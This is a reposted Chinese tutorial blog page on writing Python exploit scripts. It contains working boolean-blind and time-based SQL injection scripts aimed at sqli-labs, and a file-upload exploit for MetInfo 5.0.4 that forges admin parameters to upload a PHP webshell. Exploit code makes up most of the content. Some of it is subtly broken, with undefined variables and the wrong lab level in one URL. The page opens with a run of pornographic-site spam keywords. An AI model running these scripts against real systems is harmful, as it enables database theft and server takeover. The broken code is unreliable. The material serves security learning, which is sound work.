日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > python >内容正文

python

【CyberSecurityLearning 68】python 编写exp

發布時間:2025/3/15 python 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【CyberSecurityLearning 68】python 编写exp 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

python 編寫exp

用python腳本實現布爾盲注

用python腳本實現延時注入

文件上傳

?

python 編寫exp

exp:漏洞利用工具

以Web 漏洞為主

要求:
1、能夠看懂別人寫的exp,并修改
2、能自己寫exp

基礎環境:python3

核心模塊:requests
requests模塊介紹詳細請看:https://blog.csdn.net/Waffle666/article/details/115720052

定制頭部

重新定義User-Agent 信息

超時

GET 傳參

POST 傳參

文件上傳

cookie 信息

?

用python腳本實現布爾盲注

以sqli-labs第八關為例

import requests import stringurl = "http://192.168.3.102:82/Less-8/"normalHtmlLen = len(requests.get(url=url+"?id=1").text)print("The len of HTML: "+str(normalHtmlLen))dbNameLen =0while True:dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"#print(dbNameLen_url)if len(requests.get(dbNameLen_url).text) == normalHtmlLen:print("The len of dbNameLen: "+str(dbNameLen))breakif dbNameLen == 30:print("ERROR!")breakdbNameLen +=1dbName=""for i in range(1,9):for a in string.ascii_lowercase:dbName_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"#print(dbName_url)if len(requests.get(dbName_url).text) == normalHtmlLen:dbName +=aprint("The dbName :"+dbName)break

用python腳本實現延時注入

以sqli-labs第九關為例

import requests import stringurl = "http://192.168.3.102:82/Less-8/"def timeOut(url):try:res = requests.get(url,timeout=3)return res.textexcept Exception as e:return "timeout"dbNameLen = 0while True:dbNameLen +=1dbNameLen_url = url+"?id=1'+and+if(length(database())="+str(dbNameLen)+",sleep(5),1) --+"#print(dbNameLen_url)if "timeout" in timeOut(dbNameLen_url):print("The Len of dbName: "+str(dbNameLen))break;if dbNameLen == 30:print("ERROR!")break;dbName = ""for i in range(1,dbNameLen+1):for char in string.ascii_lowercase:dbName_url = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)--+"#print(dbName_url)if "timeout" in timeOut(dbName_url):dbName +=charprint("The dbName :"+dbName)break;

文件上傳

以Metinfov5.0.4為例,

import requests import sysurl = sys.argv[1]postUrl = urL+"http://192.168.1.200/metinfov504/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"upFile = {"FileData":open(path,"rb")}res = requests.post(url=postUrl,files=upFile)print("The Shell path:"+url+res.text[4:])

?

?

?

總結

以上是生活随笔為你收集整理的【CyberSecurityLearning 68】python 编写exp的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。